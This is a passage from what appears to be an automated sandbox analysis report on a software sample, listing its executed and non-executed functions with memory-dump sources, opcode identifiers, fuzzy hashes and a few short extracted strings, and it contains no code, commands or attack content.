                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1016dbdd12a7f1fc9766213c46c82f5fa4ac43647fd13f770eeec6ea117efae8
                                                  • Instruction ID: 863368144480b65c7acbed1e371907d164de6c4db35dbb96e734826072135eb7
                                                  • Opcode Fuzzy Hash: 1016dbdd12a7f1fc9766213c46c82f5fa4ac43647fd13f770eeec6ea117efae8
                                                  • Instruction Fuzzy Hash: E6914D31B006069FDB54EBB8C46476EB7E7AFC9304F548629D40AEB384EE74DC428B91
                                                  Function 06688178 Relevance: .2, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85706acad6305a969e3ba48d55a19c19dea38c335fe36fb0d3b3f61fbffb0e3f
                                                  • Instruction ID: f966617361b595bba3c0dfc598a836b1658e6b9ece1aab67e47378a860929f88
                                                  • Opcode Fuzzy Hash: 85706acad6305a969e3ba48d55a19c19dea38c335fe36fb0d3b3f61fbffb0e3f
                                                  • Instruction Fuzzy Hash: A4814C30F006065FDB54EBB9C46476EB6E7AF89304F508629D40AEB384EE74DC428B92
                                                  Function 0668A130 Relevance: .2, Instructions: 234COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a4d8f9871e95fddf6c2541ed9fa1ac08439d8c8c48a8eedc5df35c5ad5bf69c
                                                  • Instruction ID: 638582800d62667cb2e205516b69aa8f8957adde1ccd331fd7608fa392e0d07e
                                                  • Opcode Fuzzy Hash: 7a4d8f9871e95fddf6c2541ed9fa1ac08439d8c8c48a8eedc5df35c5ad5bf69c
                                                  • Instruction Fuzzy Hash: D261F371F001114FCB51AABEC8846AFEAD7AFD5220B15413AD80EDB360EEA5DD0287D2
                                                  Function 066884C5 Relevance: .2, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ec790a646a2dc9f80f1e01abd023380dd947188919375230bf3f3fdb4fae559
                                                  • Instruction ID: fa5abd7b4f470c3b8f2bac95132eed67912bef33c76f6a22b467e237495d3687
                                                  • Opcode Fuzzy Hash: 7ec790a646a2dc9f80f1e01abd023380dd947188919375230bf3f3fdb4fae559
                                                  • Instruction Fuzzy Hash: 86913E30E1021A8FDB60DF68C890B9DB7B1FF89300F608699D549AB355DB70AE85CF91
                                                  Function 066884D8 Relevance: .2, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b78dc9d77cab2a51e8dd80597b35ff691a0e390db585ca47407a5a4c7f8edea8
                                                  • Instruction ID: 6c47c4f30628375d4b979403cd47aa14635d5f14c119970b5863bf070f7de02e
                                                  • Opcode Fuzzy Hash: b78dc9d77cab2a51e8dd80597b35ff691a0e390db585ca47407a5a4c7f8edea8
                                                  • Instruction Fuzzy Hash: D7913C30E1021A8FDB60DF68C890B9DB7B1FF89300F608699D549AB355DB70AA85CF91
                                                  Function 06689330 Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc71d33212f864b5fe1567cbca8baae1e6fae8eab5267fd0160296be7cf5bc4f
                                                  • Instruction ID: b4d9054b95e8f6e22f2a387ebae81b85adfc577460e27894efccd4eee619d873
                                                  • Opcode Fuzzy Hash: dc71d33212f864b5fe1567cbca8baae1e6fae8eab5267fd0160296be7cf5bc4f
                                                  • Instruction Fuzzy Hash: 97412C71E006099FDB70DEADD880ABEFBB2FB85310F104A2AD15AD7650D331A955CB91
                                                  Function 06686048 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31cde8ea3b974a59d1c46e2ad89995138b3e7bc1887b5e269133d1b9af6af835
                                                  • Instruction ID: ae295a1d76d99a8a66ec30212773a8a2b208390b58cba857beb242b1449dcbca
                                                  • Opcode Fuzzy Hash: 31cde8ea3b974a59d1c46e2ad89995138b3e7bc1887b5e269133d1b9af6af835
                                                  • Instruction Fuzzy Hash: E3317E30E002099FCB55DFA9D994A9EB7F6BF89300F108619E806EB355DB71AC46CB90
                                                  Function 06686058 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f53e3861bbdc7d5a9b7260bd5ad679b901a6fc0d34b6bd8ee7ecb19a7142df5
                                                  • Instruction ID: 1ce0c12bbfe6baf3a0c0c2374b70568b60f9e54f8203a244c0b58e83f1b16ed3
                                                  • Opcode Fuzzy Hash: 6f53e3861bbdc7d5a9b7260bd5ad679b901a6fc0d34b6bd8ee7ecb19a7142df5
                                                  • Instruction Fuzzy Hash: E7314D30E102199FCF55DFA9D59469EB7F2BF89310F108629E806E7355DB71AC42CB90
                                                  Function 06687D20 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 859731554e71613bc8b5c9107ef9eadd83e370046a4f98ce680d25496d31ce02
                                                  • Instruction ID: 49b41e5d61206daebfbce078e1fdeaec4a472b0c9b7d60aca99951d02fcd97e1
                                                  • Opcode Fuzzy Hash: 859731554e71613bc8b5c9107ef9eadd83e370046a4f98ce680d25496d31ce02
                                                  • Instruction Fuzzy Hash: F6319171F003159FDB50EFBC88507BEBAF2AB48610F64816AD509F7390EA70CD0287A1
                                                  Function 06687D10 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e77e67f6ccfb99257ebc66339330d453e6b276d9a88eae41fe9d647a4225e43b
                                                  • Instruction ID: 97177cc561321b30445a3c66ec92dbbda3724fffb4743c3d3054a9c387f51976
                                                  • Opcode Fuzzy Hash: e77e67f6ccfb99257ebc66339330d453e6b276d9a88eae41fe9d647a4225e43b
                                                  • Instruction Fuzzy Hash: B031C131F013119FDB50EF78C8507BEBAE29F48214F24856AE949F7380EA74CC028BA5
                                                  Function 010BD01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2899199979.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_10bd000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                  • Instruction ID: d19611b9d146c5d2974e4616c879b4fedd6c6e7ce0d84e18114e766d8b125fff
                                                  • Opcode Fuzzy Hash: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                  • Instruction Fuzzy Hash: 70212271614200DFCB15DF98D9C4B6AFFA5EB88318F20C5ADE98A4B256C33AD447CB61
                                                  Function 06687E58 Relevance: .1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b458d89ae4c9ace00341c560ced3259639f7bb7a999dc027368ba54ffa158bd8
                                                  • Instruction ID: 3ff43a401c3d5532fc0030f61dca7126e88293687110c9b19be08df47a937521
                                                  • Opcode Fuzzy Hash: b458d89ae4c9ace00341c560ced3259639f7bb7a999dc027368ba54ffa158bd8
                                                  • Instruction Fuzzy Hash: F911C232F002156FDB54F6B888546BF76EB9BC8250B20457AD50AE7340EE61DD0387A2
                                                  Function 0668EAEF Relevance: .1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f88ca60ef0cc0f98e3d7ed6bc7e7c25c481e0a04f6e0093ba406ec7e88abd57f
                                                  • Instruction ID: 8d0dc519cd626d85d7717422ab620334bb41d7bb857d6efd6076050db3a1635c
                                                  • Opcode Fuzzy Hash: f88ca60ef0cc0f98e3d7ed6bc7e7c25c481e0a04f6e0093ba406ec7e88abd57f
                                                  • Instruction Fuzzy Hash: 13112530B013151FCB65BA78D914BAF37DADB86310F118629F60ACB381ED26DC0287E1
                                                  Function 06689320 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3fa44acaa8df91d49db799f85d7fe98f4d9e4b6b1eb4fb51731d86372f69de1c
                                                  • Instruction ID: c1f6912b89e80bf0106c7c74f7b6867e8a7b7540d979093d059b884af3e2cd5b
                                                  • Opcode Fuzzy Hash: 3fa44acaa8df91d49db799f85d7fe98f4d9e4b6b1eb4fb51731d86372f69de1c
                                                  • Instruction Fuzzy Hash: 69115931A047099FCB20DFAADCC59AFFFF6AF85300B144A2AD15597651D770A845CBA0
                                                  Function 06687E48 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4919f10b593bd6ebf10dd96bd667d4d1b81d99e1d4bd14b9d843729c30667419
                                                  • Instruction ID: 7b6ef705f6a35f3f4729a4f2eb14dd53429e21c5fa1f5da4ad8a47ac80d93773
                                                  • Opcode Fuzzy Hash: 4919f10b593bd6ebf10dd96bd667d4d1b81d99e1d4bd14b9d843729c30667419
                                                  • Instruction Fuzzy Hash: D411C432B011052FDB64EA78D8507EF77EB8BC9250F60013AE10AE3381EE619C0387E2
                                                  Function 066871D0 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bea52d243df04fb748a5e76906264e8778f966977545a05e7b4733088625cf68
                                                  • Instruction ID: 194741713d11ab8f240a8d4038df50155e8c3e2f73c158354235ab78406efb30
                                                  • Opcode Fuzzy Hash: bea52d243df04fb748a5e76906264e8778f966977545a05e7b4733088625cf68
                                                  • Instruction Fuzzy Hash: B4216F30E002199FCF54EBB9D9546DEBBF5EB49310F2045A9E509E7350DA32D941CF50
                                                  Function 010BD006 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2899199979.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_10bd000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                  • Instruction ID: dee948e5d5e0957d1fc3baed9601f58d4d2648c21173e58b71d4bbb22aa177f9
                                                  • Opcode Fuzzy Hash: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                  • Instruction Fuzzy Hash: 772153755083809FDB12CF54D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9856CB62
                                                  Function 066880C7 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4a1826d0ed7da74d51b69e119d21f1f5b2037a6d2f43536b990c6540e21770f
                                                  • Instruction ID: 8e0d72366fdc5a58ea062587aacb20af536031d6fca25c5eb8cc342a600e6b77
                                                  • Opcode Fuzzy Hash: f4a1826d0ed7da74d51b69e119d21f1f5b2037a6d2f43536b990c6540e21770f
                                                  • Instruction Fuzzy Hash: 4101D231B041520FDB95A67EE86076AABDADBCA710F14857EE04EC7392DD21CC468381
                                                  Function 06687AE8 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a35d27a4ff0e6f14648972375668a436742b2ee008986697c5d7895a3fd0c140
                                                  • Instruction ID: 9d1bf712d0054e0b530f85c13035d8249762019e2a33dbf8cbbcefe11f39467c
                                                  • Opcode Fuzzy Hash: a35d27a4ff0e6f14648972375668a436742b2ee008986697c5d7895a3fd0c140
                                                  • Instruction Fuzzy Hash: CA21C2B5D01259AFCB00DFAAD884ADEFFB8FB49310F10812AE518A7740C374A954CFA5
                                                  Function 066837AC Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d54eeabbaedbe6f6e4d2523b06f72d1c6b9db071f8e081cb4c40556cad17ee3
                                                  • Instruction ID: 54c4a13165278a0c33fd7bcda75abbf194355857c83508224a2e5e6817952d52
                                                  • Opcode Fuzzy Hash: 7d54eeabbaedbe6f6e4d2523b06f72d1c6b9db071f8e081cb4c40556cad17ee3
                                                  • Instruction Fuzzy Hash: A421C0B1D01259AFCB00DF9AD884ADEFFB4FB49310F20812AE918A7240D374A954CFA5
                                                  Function 066880D8 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad1766f574f33de068dc4ab31d20cb5f89838382a5b8129338be44c83d8623ed
                                                  • Instruction ID: 6134b3c2cf8f75cd81fed85b63d40bee27ef32f029d15ce22e35224e99bf1a85
                                                  • Opcode Fuzzy Hash: ad1766f574f33de068dc4ab31d20cb5f89838382a5b8129338be44c83d8623ed
                                                  • Instruction Fuzzy Hash: E001AD31B101120FDB64A57EE894B2BA3CADBCA720F20893DE10EC7344DE65DC428791
                                                  Function 0668EB00 Relevance: .0, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f789e6956d51debf2d2b241d679cf08cacd627efb77347f24ba05b8527501849
                                                  • Instruction ID: c5e06dea255c004bb55358fe0c5ef3e9301f64e0d64900aa82ced6666242098d
                                                  • Opcode Fuzzy Hash: f789e6956d51debf2d2b241d679cf08cacd627efb77347f24ba05b8527501849
                                                  • Instruction Fuzzy Hash: 19018630B003151FDB64B67DE55476F72D6DB89714F508529E10BC7344ED66DC0287D5
                                                  Function 010AD628 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2899081030.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_10ad000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 989342b1c02299801d5fe53baedd82c2a5d5d5068184ecf0301c8ee23b5b43a8
                                                  • Instruction ID: 28c0e5af1668ebb98b84121ab27f045d3a2f3464a3fb7e44468eda543a5ace84
                                                  • Opcode Fuzzy Hash: 989342b1c02299801d5fe53baedd82c2a5d5d5068184ecf0301c8ee23b5b43a8
                                                  • Instruction Fuzzy Hash: 96F062714083449AE7118A5AD884B66FFE8EF45724F18C49AED4C4E687C3799844DBB1
                                                  Function 0668A3C1 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f383a34d181c8a12badac849a21f5eea616b2b200d67f809cf3f80fa88266df1
                                                  • Instruction ID: 579074f6ffd1ab69ad8b127f177eb33dba22b7f4482a0f1c4210ba9662d7c447
                                                  • Opcode Fuzzy Hash: f383a34d181c8a12badac849a21f5eea616b2b200d67f809cf3f80fa88266df1
                                                  • Instruction Fuzzy Hash: 0BF06531D19248EFDB60DEB4D98174A7BA9DB02204F20499AD884C7202E576DD01C791
                                                  Function 0668A3D0 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 000681e7d3af8b73ddd273f26b482b98d8f964234c4fcacff3e4f8c0064acdff
                                                  • Instruction ID: f0feb2056144c1616b5d1896d0267ccdea2936585dd56d74d89fcfd2794a4dca
                                                  • Opcode Fuzzy Hash: 000681e7d3af8b73ddd273f26b482b98d8f964234c4fcacff3e4f8c0064acdff
                                                  • Instruction Fuzzy Hash: 5EE0EC71E14108AFDF50EEF4C94575E76ADD701214F208AAAD809D7301E576DE42D780
                                                  Function 06685BA0 Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7eba8dc842865bc2dbeec111bb660c787c6157277df03ef1de821119f5ccd48
                                                  • Instruction ID: d6fa996405d9172f58e9f6d0a50c01c955a2cfef8c5acc30a75761970d9b3c66
                                                  • Opcode Fuzzy Hash: b7eba8dc842865bc2dbeec111bb660c787c6157277df03ef1de821119f5ccd48
                                                  • Instruction Fuzzy Hash:

                                                  Non-executed Functions

                                                  Function 0668B420 Relevance: 21.7, Strings: 17, Instructions: 435COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: c<$$c<$(c<$.5vq$6c<$Hc<$Vc<$Zc<$kc<$uc<$xc<$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-1940057540
                                                  • Opcode ID: dd9bad55e9de742d838686ff296ec075fe9d799e0d953c2f3c242c194476d0c3
                                                  • Instruction ID: 6273999cd9fad5b8cb7a5e4d4be817926edf8ed48780f0f7299e845cd28aa15e
                                                  • Opcode Fuzzy Hash: dd9bad55e9de742d838686ff296ec075fe9d799e0d953c2f3c242c194476d0c3
                                                  • Instruction Fuzzy Hash: 63F14A30B003098FDB58EFB9C55466EB7E2BF95304F208669D41AAB3A4DE71DC46CB91
                                                  Function 0668F1D0 Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-3823777903
                                                  • Opcode ID: f5f79842b319d61869ef6447df3e903d91dfc03c0979160358d5d7c0e913954b
                                                  • Instruction ID: e2ee77fc9244ec360771357e109c50507c8ba3aa0d9c590b7d50a81ef7665ccf
                                                  • Opcode Fuzzy Hash: f5f79842b319d61869ef6447df3e903d91dfc03c0979160358d5d7c0e913954b
                                                  • Instruction Fuzzy Hash: 85918D30E003099FDB68FFB9D55476E76F2AF84344F208629E406AB395DE749C46CB91
                                                  Function 0668B410 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (c<$.5vq$6c<$Hc<$Vc<$Zc<
                                                  • API String ID: 0-737864906
                                                  • Opcode ID: 28b8dc806a486ed4fdb0d4cae2666dddf88b7c0c9d02af63bff2ecfcbcf96fc5
                                                  • Instruction ID: b6c378015f34f2691e24d39c8ffcfaebbb3170037b8f3e6ec14719959a27f6a0
                                                  • Opcode Fuzzy Hash: 28b8dc806a486ed4fdb0d4cae2666dddf88b7c0c9d02af63bff2ecfcbcf96fc5
                                                  • Instruction Fuzzy Hash: F0713A30A013198FDB58EFB9C5547AEB7F6BF84304F608629E405AB3A4DB719C46CB91
                                                  Function 0668E860 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Cc<$Jc<$Sc<$fc<$lc<
                                                  • API String ID: 0-1955103774
                                                  • Opcode ID: 602c5406ecb5eb676d950d6f4a036014b5c5977f9814f6ea6dd7417377b9c370
                                                  • Instruction ID: fa41319dd26f050b515856d6aca344a81bc9d0452e659c8d44e47fd92615e416
                                                  • Opcode Fuzzy Hash: 602c5406ecb5eb676d950d6f4a036014b5c5977f9814f6ea6dd7417377b9c370
                                                  • Instruction Fuzzy Hash: 21519435B102055FDB94FBB8D4506AEB2E7EBC9614F108639E50AEB390EE71DC068B91
                                                  Function 0668DC50 Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: c<$Ec<$Uc<$`c<
                                                  • API String ID: 0-665649908
                                                  • Opcode ID: 79b7ed0765c06116e7fc7e56ca7abdf489be97cd74ae88b274c42fcda1893463
                                                  • Instruction ID: 53c036416d1cf9d1d83b1fcafee267deb69e553d54fdb8cf76f12aa5a9b1964a
                                                  • Opcode Fuzzy Hash: 79b7ed0765c06116e7fc7e56ca7abdf489be97cd74ae88b274c42fcda1893463
                                                  • Instruction Fuzzy Hash: 20D18E30F00259CFCBA4EF64C8946AEB7F2AF95304F548599D449AF394DB709C86CB91
                                                  Function 0668C8E8 Relevance: 5.3, Strings: 4, Instructions: 298COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
